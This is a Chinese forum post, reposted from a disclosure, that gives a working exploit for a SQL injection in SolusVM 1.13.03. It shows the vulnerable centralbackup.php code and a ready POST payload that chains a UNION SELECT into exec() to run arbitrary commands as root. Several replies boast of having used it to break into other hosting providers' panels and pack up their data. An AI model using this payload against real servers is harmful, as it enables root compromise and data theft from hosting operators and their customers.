【干货】美国VPS管理系统SolusVM 1.13.03 SQL注入漏洞(含exp)
相信这几天用SolusVM的同学都提心吊胆了好多天吧……做好数据备份的同学淡定地用吧……
============以上是废话============
披露漏洞的博主地址:http://localhost.re/p/solusvm-11303-vulnerabilities
本文转载自:http://www.freebuf.com/vuls/10611.html
SolusVM 1.13.03 Vulnerabilities
2013/06/16
/centralbackup.php:[*] query('SELECT * FROM centralbackup WHERE id = \'' . $_POST['deleteid'] . '\'', true);
[*] #[...]
[*] if ($xc == 'failed') {
[*] exec('php /usr/local/solusvm/system/bus.php -- --comm=deletebackup --serverid=' . $xc['bserver'] . ' --nodeid=' . $vdata['nodeid'] . ' --vserverid=' . $vdata['vserverid'] . ' --filename=' . $xc['filename']);
[*] #[...]
[*] }
[*] }
[*]?>复制代码到了这里我们该怎么做的?SQL注入?exec()?setuid为0?都正确! 让我们来看看exp是怎样的?非常简单的三步[*]1.在激活的VM中拥有一个账户
[*]2.登陆,在VM中点击,拷贝GET _v值
[*]3.POST 至/centralbackup.php?_v=复制代码[*]delete=1&deleteid=-1' union select 0,0,0,0,0,'failed',';/usr/local/solusvm/core/solusvmc-node --ebtables ";command to run as root";',0#复制代码或者使用以下Html表单[*]
[*]
[*]
[*]
[*] CMD:
[*]
[*]
[*]复制代码 zmban 耶,成功注入饭桶家后台,打包数据中,,,,
誓誓 发表于 2013-6-21 10:57
back.gif
耶,成功注入饭桶家后台,打包数据中,,,,
求分享 还是 看不懂..... 有的已经补了,还是WHMCS的库好。 耶,成功注入单手MJJ家的 不明觉厉
008.gif
禁止跨域提交这个不是好多天了吗。。。? 真心不太懂
页:
[1]
2